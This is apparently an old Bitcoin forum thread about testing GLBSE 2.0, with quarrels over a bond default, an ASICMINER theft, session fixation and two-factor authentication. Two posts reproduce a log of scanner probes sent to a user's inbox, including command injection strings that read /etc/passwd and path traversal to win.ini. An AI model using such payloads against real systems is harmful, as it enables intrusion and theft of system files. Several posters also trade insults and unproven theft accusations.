GLBSE 2.0 open for testing

[Nefario]

He told me that as well - but that was around Friday the 17th...

Of course, that has always been his position until he had to pay.

Obviously later he realized that you and your goats are going to screw the little people over, using the BS&T liquidation as an excuse.

I don't see your reasoning, AFAIK all PPT have been explicit, funds are repaid when pirate pays, not repaid if he defaults. The exceptions to this were the insured PPT's which have already paid out insurance in at least 2 instances (Goat and DeadTerra).

I couldn't hand over the information if I wanted to (which I don't), as the data protection act prevents me from doing so (see here and here for information on the data protection act, to which I am subject).

Also how is it me and goat screwing over the little people what do we profit from this?

All I've done is created a platform and allowed people to use it.
All Goat has done is everything he said he would.

People knew what they were “invested" in and the risk was theirs, are you saying people should not be responsible for their own decisions?

So IMO he's played it very well. And now you are fucking screwed Nefario, together with your fucking goat.

Lol, fucked a goat, but seriously, since I disagreed with you on the details（accusations, you know, I used facts, which you seemed immune to) of your crusade against goat (who I don't have much love for BTW) you've had it in for me.

If anyone is going to trust you again, these will be only stupid people with no money.
I warned you that Goat was going to pull you down, to the very bottom where he already was - you should have believed me.

What are you talking about? Pull me down? All the down to China town? Really bro get a grip.

[1713286951]

1713286951

[btharper]

Really bro get a grip.

Hearing this from you Nefario amuses me to no end, you're normally extremely well-spoken.

and @piotr_n, seriously man? What the hell? You can't be reasoned with, you won't see fact. You thought something looked shady (and I agree it did) it was explained but you're still stuck on it. Who you agreed before he disagreed with you would be able to settle things.

Second that troll is a troll. He is on my ignore list... I have been buying these bonds at a good discount. I currently have bids in. This guy is just a troll with FUD.

You have no honor whatsoever, you fucking liar.

GLBSE API don't lie.
But if it is not enough for you, we can always ask Nefario to check if you have sold any TYGRR.BOND-P since Pirate announced the close down.
Because if you haven't - it means GLBSE's API is broken...
So, should I file the bug report?

Yeah, Ask Nefario. I did not sell any P bonds, however I did buy...

Once you ask I expect an apology... 

OK!

But it didn't go your way and now you're bitching in every avenue you can find about how everyone who has disagreed with you is wrong and obviously all lying to screw everyone else.

So might I extend a polite "Fuck off and don't come back" to you?

[Nefario]

Hearing this from you Nefario amuses me to no end, you're normally extremely well-spoken.

Sorry, I'm just getting really tired of people attacking me or GLBSE, they don't have anything to actually criticize so they make stuff up and throw all kinds of baseless accusations.

There is piotr_n as you see but also MPOE-PR (Mircea Popescu of Romania's sock puppet), who lately has been saying that I'm being sued as part of the Bitcoinica lawsuit (says I'm one of the unnamed Does), the guy is making up all kinds of stuff, and attacking me when I'm on IRC.

[ZodiacDragon84]

you have always done right by me, Nefario. I will continue to show support of the GLBSE platform by continued use of it.

Regards,
Andrew

[Gladamas]

you have always done right by me, Nefario. I will continue to show support of the GLBSE platform by continued use of it.

Regards,
Andrew

+1. We regard you, Nefario, with great respect. Thanks for all your hard work; the community really appreciates what you do. It's a shame that people like piotr_n try to insult and flame everyone who they disagree with the slightest bit.

[piotr_n]

you have always done right by me, Nefario. I will continue to show support of the GLBSE platform by continued use of it.

Regards,
Andrew

+1. We regard you, Nefario, with great respect. Thanks for all your hard work; the community really appreciates what you do. It's a shame that people like piotr_n try to insult and flame everyone who they disagree with the slightest bit.

Hey - there was a theft on the service and Nefario has refused to provide any information about the thief - he basically did nothing!
He didn't even give the name of the account that "bought" the 2443 of ASICMINER assets at 0.00021 BTC!
Not to mention reverting the transaction - c'mon, how hard would that be?
Considering the above, every sane person would assume that he was actually involved in the theft.

But since the topic says "GLBSE 2.0 open for testing", to prevent my post from being deleted again because of an alleged and ever valid reason of "off-topic", I will suggest at the end that maybe it was a bug that Nefario should investigate?

[mila]

That's the spirit!

...
I will suggest at the end that maybe it was a bug that Nefario should investigate?

bugs should be investigated

[nedbert9]

you have always done right by me, Nefario. I will continue to show support of the GLBSE platform by continued use of it.

Regards,
Andrew

+1. We regard you, Nefario, with great respect. Thanks for all your hard work; the community really appreciates what you do. It's a shame that people like piotr_n try to insult and flame everyone who they disagree with the slightest bit.

Hey - there was a theft on the service and Nefario has refused to provide any information about the thief - he basically did nothing!
He didn't even give the name of the account that "bought" the 2443 of ASICMINER assets at 0.00021 BTC!
Not to mention reverting the transaction - c'mon, how hard would that be?
Considering the above, every sane person would assume that he was actually involved in the theft.

But since the topic says "GLBSE 2.0 open for testing", to prevent my post from being deleted again because of an alleged and ever valid reason of "off-topic", I will suggest at the end that maybe it was a bug that Nefario should investigate?

Ok.

I am the victim of the ASICMINER theft.  My nature is not to sling sh*t around - particularly when a hacker gets in and no one can definitively point out the method used for the hack.

Also, GLBSE is a great enabler of Bitcoin denominated economic activity.  Props to Nefario for that.

I am only responding on this topic because I see that someone feels just like I do.  Someone takes a loss of thousands of dollars and no one cares to do anything about it if it would only cost ~30 BTC to revert.

With that said I'm super pissed.  Yes, I'm super pissed at GLBSE.  I am also pissed at myself for not doing the right thing and taking pro-active measures to prevent account compromise by enabling 2FA for both login, transfers and withdrawals.  You are not protected from session attacks if you don't enable 2FA for every single GLBSE activity.  Do it.

Since the compromise of my GLBSE account I have set up all sort of IP logging activity just to review and verify that I'm not on a Botnet or compromised by a trojan of any sort.  
My system is quiet.  Nothing unusual.  

3000 shares of ASICMINER asset were transferred to me on 8/23.  An hour later I logged in to web freenode #bitcoin-otc.  I cannot say for certain whether I manually killed my GLBSE session.  I do know that no browser window was open to GLBSE.  I remained logged in to #bitcoin-otc for a few hours.  Later in the evening people were posting of a dump of ASICMINER asset.  I logged in to GLBSE account to find the asset liquidated for ~ %1 of it's value.  

Absolutely nothing occurred on that day out of the ordinary other than visiting freenode.  I have relatively few apps on the system and less running at any one time.  I am not a security expert, but I take precautions and I've never been infected in any obvious way or by report of antivirus or by any insane amount of TCP activity.

So, what I had suspected and with Nefario also pointing out the same possibility is that I was a victim of Session Fixation.  Someone hijacked my GLBSE session.

Nefario's position on this is that attacks of this nature, Session Fixation, are not the responsibility of GLBSE, but admitting at the same time that additional security precautions could be taken on the GLBSE web application side that could make it more difficult to accomplish session related attacks.

At this point I did two things.  Looked up Web security whitepapers.  Found one stating "Session Fixation, ultimately, can only effectively be countered by the Web application (which would include the client side scripting) in how it controls session generation and invalidation."  Ok, fine.  At this point I'm thinking if I close my browser window what happens to my GLBSE session.  If my session was hijacked that would have been the obvious way to get in.  Opened up my Chrome console and looked at the session ID's.  Session ID's persisted across browser windows with a 48 hour browser side expiration period.  Of course, there could be a shorter session expiration period on the web app side.

Edit:
A few thoughts occurred to me.

Why isn't Javascript used to invalidate sessions when the DOM for the page destroyed?
Why aren't sessions invalidated on a client side timer?  Such as most banking sites?
Why isn't 2FA a requirement for every single GLBSE activity?

I think you can see the premise of my questions.  I do believe GLBSE is partially responsible for my loss.

I'm angry because it's entirely too easy to commit fraud and get away with it in a system of Bitcoin and GLBSE that allows or enforces anonymity and instantaneous transfers.  
The feeling I got from the incident is one of "use at your own risk."  

[cuz0882]

I've been thinking it would be a great security feature if you put a 24 hour delay on the creation of assets. That or something similar to protect assets if there is a hacked account.

[Namworld]

Hey - there was a theft on the service and Nefario has refused to provide any information about the thief - he basically did nothing!
He didn't even give the name of the account that "bought" the 2443 of ASICMINER assets at 0.00021 BTC!
Not to mention reverting the transaction - c'mon, how hard would that be?
Considering the above, every sane person would assume that he was actually involved in the theft.

But since the topic says "GLBSE 2.0 open for testing", to prevent my post from being deleted again because of an alleged and ever valid reason of "off-topic", I will suggest at the end that maybe it was a bug that Nefario should investigate?

Well first, to reverse a transaction, Nefario would need to be able to verify that the person didn't willingly liquidate the asset and is having second thoughts, something that may be hard if no compromise was detected and the account got his session hijacked or his account login leaked by a keyloggers. Just like a real stock market, you don't go around requiring your transactions to be reversed, all transactions are final.

Ok.

I am the victim of the ASICMINER theft.  My nature is not to sling sh*t around - particularly when a hacker gets in and no one can definitively point out the method used for the hack.

Also, GLBSE is a great enabler of Bitcoin denominated economic activity.  Props to Nefario for that.

I am only responding on this topic because I see that someone feels just like I do.  Someone takes a loss of thousands of dollars and no one cares to do anything about it if it would only cost ~30 BTC to revert.

With that said I'm super pissed.  Yes, I'm super pissed at GLBSE.  I am also pissed at myself for not doing the right thing and taking pro-active measures to prevent account compromise by enabling 2FA for both login, transfers and withdrawals.  You are not protected from session attacks if you don't enable 2FA for every single GLBSE activity.  Do it.

Since the compromise of my GLBSE account I have set up all sort of IP logging activity just to review and verify that I'm not on a Botnet or compromised by a trojan of any sort. 
My system is quiet.  Nothing unusual. 

3000 shares of ASICMINER asset were transferred to me on 8/23.  An hour later I logged in to web freenode #bitcoin-otc.  I cannot say for certain whether I manually killed my GLBSE session.  I do know that no browser window was open to GLBSE.  I remained logged in to #bitcoin-otc for a few hours.  Later in the evening people were posting of a dump of ASICMINER asset.  I logged in to GLBSE account to find the asset liquidated for ~ %1 of it's value. 

Absolutely nothing occurred on that day out of the ordinary other than visiting freenode.  I have relatively few apps on the system and less running at any one time.  I am not a security expert, but I take precautions and I've never been infected in any obvious way or by report of antivirus or by any insane amount of TCP activity.

So, what I had suspected and with Nefario also pointing out the same possibility is that I was a victim of Session Fixation.  Someone hijacked my GLBSE session.

Nefario's position on this is that attacks of this nature, Session Fixation, are not the responsibility of GLBSE, but admitting at the same time that additional security precautions could be taken on the GLBSE web application side that could make it more difficult to accomplish session related attacks.

At this point I did two things.  Looked up Web security whitepapers.  Found one stating "Session Fixation, ultimately, can only effectively be countered by the Web application (which would include the client side scripting) in how it controls session generation and invalidation."  Ok, fine.  At this point I'm thinking if I close my browser window what happens to my GLBSE session.  If my session was hijacked that would have been the obvious way to get in.  Opened up my Chrome console and looked at the session ID's.  Session ID's persisted across browser windows with a 48 hour browser side expiration period.  Of course, there could be a shorter session expiration period on the web app side.

Two thoughts occurred to me.

Why isn't Javascript used to invalidate sessions when the DOM for the page destroyed?
Why isn't 2FA a requirement for every single GLBSE activity?

2 factor auth is not required simply because it requires an external device (smartphone) to be efficient and not everyone has a smartphone. I decided to get one specifically to protect my GLBSE assets.

The main purpose being that if someone hijacks your session or keylogs your computer, that person cannot simply log in/make transactions since the person would also need access to the external device, which is almost impossible except in person for your smartphone.

I'm angry because it's entirely too easy to commit fraud and get away with it in a system of Bitcoin and GLBSE that allows or enforces anonymity and instantaneous transfers. 
The feeling I got from the incident is one of "use at your own risk." 

Let's quote the user terms:

5. The Users of the Exchange take full responsibility for their own actions, and any consequences resulting from those actions. It is the Users' own responsibility to determine the risks involved in depositing funds with the Exchange, creating assets, executing trades, or any other activity or action related to the use of the Exchange, or any of its current services.
6. The Exchange is currently beta release software, and as such the Exchange assumes no responsibility or liability for any losses that may be incurred if the Exchange is taken offline to deal with any problems that may arise. The Exchange makes no guarantees as to the correct functioning of its services until it is removed from beta release, although the Exchange will do its best to ensure it is functioning correctly. The Users use the Exchange at their own risk.

People started using GLBSE while Nefario was still developing and testing it in version 1.0

It is still not out of beta however.

Since then he's been working overtime to polish features, secure it and develop it further as fast as he could. Now I don't know how well secured the platform is, but so far, all account thefts reported were linked to accounts without 2 factor authentication, for which the login info was most likely leaked. I don't know how he prevents any session related security issues, but it remains that:
- any session can always be taken over no matter the security measures if the person has access to your session ID + IP.
- any account can be accessed if your login info were keylogged.

Hence the need for 2 factor auth to prevent withdrawals/logins.

[nedbert9]

2 factor auth is not required simply because it requires an external device (smartphone) to be efficient and not everyone has a smartphone. I decided to get one specifically to protect my GLBSE assets.

This is false.  JAuth and other OSS software are available for OSX, Win and Linux to use the Google 2FA framework.

There is no device based excuse not to use 2FA.


The problem here is that there is no notification about *how to use* 2FA, including any links to needed software, on GLBSE.


This gives the wrong impression just like both you and I had about 2FA.  I didn't turn on 2FA on GLBSE because I don't have a smart phone.


Terms of Service doesn't mean someone isn't negligent.  It's just that they might not be legally responsible for being negligent.

[bitcoinbear]

2 factor auth is not required simply because it requires an external device (smartphone) to be efficient and not everyone has a smartphone. I decided to get one specifically to protect my GLBSE assets.

This is false.  JAuth and other OSS software are available for OSX, Win and Linux to use the Google 2FA framework.

There is no device based excuse not to use 2FA.


The problem here is that there is no notification about *how to use* 2FA, including any links to needed software, on GLBSE.


This gives the wrong impression just like both you and I had about 2FA.  I didn't turn on 2FA on GLBSE because I don't have a smart phone.


Terms of Service doesn't mean someone isn't negligent.  It's just that they might not be legally responsible for being negligent.

Does anybody have a quick link to info on the 2FA?

[Namworld]

2 factor auth is not required simply because it requires an external device (smartphone) to be efficient and not everyone has a smartphone. I decided to get one specifically to protect my GLBSE assets.

This is false.  JAuth and other OSS software are available for OSX, Win and Linux to use the Google 2FA framework.

There is no device based excuse not to use 2FA.


The problem here is that there is no notification about *how to use* 2FA, including any links to needed software, on GLBSE.


This gives the wrong impression just like both you and I had about 2FA.  I didn't turn on 2FA on GLBSE because I don't have a smart phone.


Terms of Service doesn't mean someone isn't negligent.  It's just that they might not be legally responsible for being negligent.

True, you can use it on a computer too, but it SHOULD be an external computer, not the computer you use to login. Which also requires an external device such as an extrea computer, or smartphone. Otherwise someone with a compromised computer can still get your account stolen easily. The 2 factor auth needs to be on another device to effectively block infected/keylogged computers from stealing an account. There's no instructions as to how to use it, but there ARE links to the Google Authentificator app along with the name written in big at the top of the page. You can simply click one of those links or go read about it. There's more than enough instructions on Google's website about it.

And yes, I'm not saying it couldn't be negligence. I'm saying that people started using a service which was NOT finished and Nefario still doesn't claim it to be a finished product, although he's been working quickly since 1.0 when he noticed someone had created an asset for real use. The product never got out of Beta however. However it does seem secure so far.

If you weren't doing anything else than using GLBSE and IRC, and never clicked any link in IRC, my best guess would be that someone had your login info or a compromised account.

If it was a session hijack, then GLBSE's security could be improved to deter this.

The easiest attack would probably be if GLBSE accepts the session ID to be set externally and you click a shortened url which brings to a page with a redirect script. The redirect brings to an actual legit page. The page containing the redirect first records an ID and open in a frame GLBSE setting the session ID to said ID. Everyone that clicked on the link sees a legit page loading but has now a new session identifier set for GLBSE. The attacker now can try accessing GLBSE with each generated ID and if associated with someone already logged in GLBSE, he can get access to the account. Although I'd be very surprised that GLBSE accepts the session ID to be set/changed through a link, it would be a major security risk. Many things could be done to prevent session based attacks if not already done.

Does anybody have a quick link to info on the 2FA?

http://support.google.com/a/bin/answer.py?hl=en&answer=1037451

[muyuu]

Are graphs not working?

[arsenische]

i received strange letters at glbse mailbox:

asdzxc   arsenische    18:28 Fri-31/Aug   1
asdzxc   arsenische    18:28 Fri-31/Aug   1
asdzxc   arsenische    18:28 Fri-31/Aug   1
asdzxc   arsenische    18:25 Fri-31/Aug    SomeCustomInjectedHeader:injected_by_wvs
asdzxc   arsenische    18:25 Fri-31/Aug    SomeCustomInjectedHeader:injected_by_wvs
asdzxc   arsenische    18:25 Fri-31/Aug    SomeCustomInjectedHeader:injected_by_wvs
asdzxc   arsenische    18:24 Fri-31/Aug   '"()
asdzxc   arsenische    18:24 Fri-31/Aug   {"$acunetix"=>"1"}
asdzxc   arsenische    18:24 Fri-31/Aug   1
asdzxc   arsenische    18:24 Fri-31/Aug   1
asdzxc   arsenische    18:24 Fri-31/Aug   1
asdzxc   arsenische    18:23 Fri-31/Aug   http://testasp.vulnweb.com/t/fit.txt?%00.jpg
asdzxc   arsenische    18:23 Fri-31/Aug   1some_inexistent_file_with_long_name%00.jpg
asdzxc   arsenische    18:23 Fri-31/Aug   http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
asdzxc   arsenische    18:21 Fri-31/Aug   1
asdzxc   arsenische    18:21 Fri-31/Aug   1
asdzxc   arsenische    18:21 Fri-31/Aug   ${100036+99616}
asdzxc   arsenische    18:21 Fri-31/Aug   1
asdzxc   arsenische    18:21 Fri-31/Aug   1
...
asdzxc   arsenische    19:03 Fri-31/Aug   "|dir
asdzxc   arsenische    19:03 Fri-31/Aug   '&dir&'
asdzxc   arsenische    19:03 Fri-31/Aug   '|dir
asdzxc   arsenische    19:03 Fri-31/Aug   |dir
asdzxc   arsenische    19:03 Fri-31/Aug   "&dir&"
asdzxc   arsenische    19:03 Fri-31/Aug   ";cat /etc/passwd;"
asdzxc   arsenische    19:03 Fri-31/Aug   &dir
asdzxc   arsenische    19:03 Fri-31/Aug   ||cat /etc/passwd
asdzxc   arsenische    19:03 Fri-31/Aug   ';cat /etc/passwd;'
asdzxc   arsenische    19:03 Fri-31/Aug   |cat /etc/passwd#
asdzxc   arsenische    19:03 Fri-31/Aug   "|"ld
asdzxc   arsenische    19:03 Fri-31/Aug   '|'ld
asdzxc   arsenische    19:03 Fri-31/Aug   `cat /etc/passwd`
asdzxc   arsenische    19:03 Fri-31/Aug   ;cat /etc/passwd;
asdzxc   arsenische    19:03 Fri-31/Aug    cat /etc/passwd
asdzxc   arsenische    19:03 Fri-31/Aug   &cat /etc/passwd&
asdzxc   arsenische    19:03 Fri-31/Aug   '&cat /etc/passwd&'
asdzxc   arsenische    19:03 Fri-31/Aug   "&cat /etc/passwd&"
asdzxc   arsenische    19:02 Fri-31/Aug   /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
asdzxc   arsenische    19:02 Fri-31/Aug   ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini


-- is everything ok?

[Namworld]

Looks like someone is trying to hack GLBSE by using the mailing form =/

Don't think it will work tho.

[DiabloD3]

i received strange letters at glbse mailbox:

asdzxc   arsenische    18:28 Fri-31/Aug   1
asdzxc   arsenische    18:28 Fri-31/Aug   1
asdzxc   arsenische    18:28 Fri-31/Aug   1
asdzxc   arsenische    18:25 Fri-31/Aug    SomeCustomInjectedHeader:injected_by_wvs
asdzxc   arsenische    18:25 Fri-31/Aug    SomeCustomInjectedHeader:injected_by_wvs
asdzxc   arsenische    18:25 Fri-31/Aug    SomeCustomInjectedHeader:injected_by_wvs
asdzxc   arsenische    18:24 Fri-31/Aug   '"()
asdzxc   arsenische    18:24 Fri-31/Aug   {"$acunetix"=>"1"}
asdzxc   arsenische    18:24 Fri-31/Aug   1
asdzxc   arsenische    18:24 Fri-31/Aug   1
asdzxc   arsenische    18:24 Fri-31/Aug   1
asdzxc   arsenische    18:23 Fri-31/Aug   http://testasp.vulnweb.com/t/fit.txt?%00.jpg
asdzxc   arsenische    18:23 Fri-31/Aug   1some_inexistent_file_with_long_name%00.jpg
asdzxc   arsenische    18:23 Fri-31/Aug   http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
asdzxc   arsenische    18:21 Fri-31/Aug   1
asdzxc   arsenische    18:21 Fri-31/Aug   1
asdzxc   arsenische    18:21 Fri-31/Aug   ${100036+99616}
asdzxc   arsenische    18:21 Fri-31/Aug   1
asdzxc   arsenische    18:21 Fri-31/Aug   1
...
asdzxc   arsenische    19:03 Fri-31/Aug   "|dir
asdzxc   arsenische    19:03 Fri-31/Aug   '&dir&'
asdzxc   arsenische    19:03 Fri-31/Aug   '|dir
asdzxc   arsenische    19:03 Fri-31/Aug   |dir
asdzxc   arsenische    19:03 Fri-31/Aug   "&dir&"
asdzxc   arsenische    19:03 Fri-31/Aug   ";cat /etc/passwd;"
asdzxc   arsenische    19:03 Fri-31/Aug   &dir
asdzxc   arsenische    19:03 Fri-31/Aug   ||cat /etc/passwd
asdzxc   arsenische    19:03 Fri-31/Aug   ';cat /etc/passwd;'
asdzxc   arsenische    19:03 Fri-31/Aug   |cat /etc/passwd#
asdzxc   arsenische    19:03 Fri-31/Aug   "|"ld
asdzxc   arsenische    19:03 Fri-31/Aug   '|'ld
asdzxc   arsenische    19:03 Fri-31/Aug   `cat /etc/passwd`
asdzxc   arsenische    19:03 Fri-31/Aug   ;cat /etc/passwd;
asdzxc   arsenische    19:03 Fri-31/Aug    cat /etc/passwd
asdzxc   arsenische    19:03 Fri-31/Aug   &cat /etc/passwd&
asdzxc   arsenische    19:03 Fri-31/Aug   '&cat /etc/passwd&'
asdzxc   arsenische    19:03 Fri-31/Aug   "&cat /etc/passwd&"
asdzxc   arsenische    19:02 Fri-31/Aug   /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
asdzxc   arsenische    19:02 Fri-31/Aug   ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini


-- is everything ok?

I got the same crap too from the same user.

232 new messages.

Nefario, do me a favor and fix my inbox.

[btharper]

I would be very disappointed if that crap worked on GLBSE, I'm glad to see no one posted anything but annoyance at the spam. (Also, maybe there's a use for a "Report spam" Button?)

There are definitely things that can be done to improve security, but as with any patch Nefario has to be careful to make sure any patch he applies doesn't introduce a security vulnerability, even if it's a security patch. During/after that he has to make sure that the site remains functional; a patch that helps keep other people from hijacking your session may make it harder for you to use your session, which would certainly annoy a great many users.

I'm sure he's hard at work on something, though I can't say for sure what (It may still be features other than security enhancements, there are plenty of people yelling for those too)

[DiabloD3]

Nefario seems to be very busy in real life and is out of his country, so he might not be heard from for a few days.

[Namworld]

He was visiting his wife's family in China. I'm not sure when he's going back home. I believe within the next 2 weeks.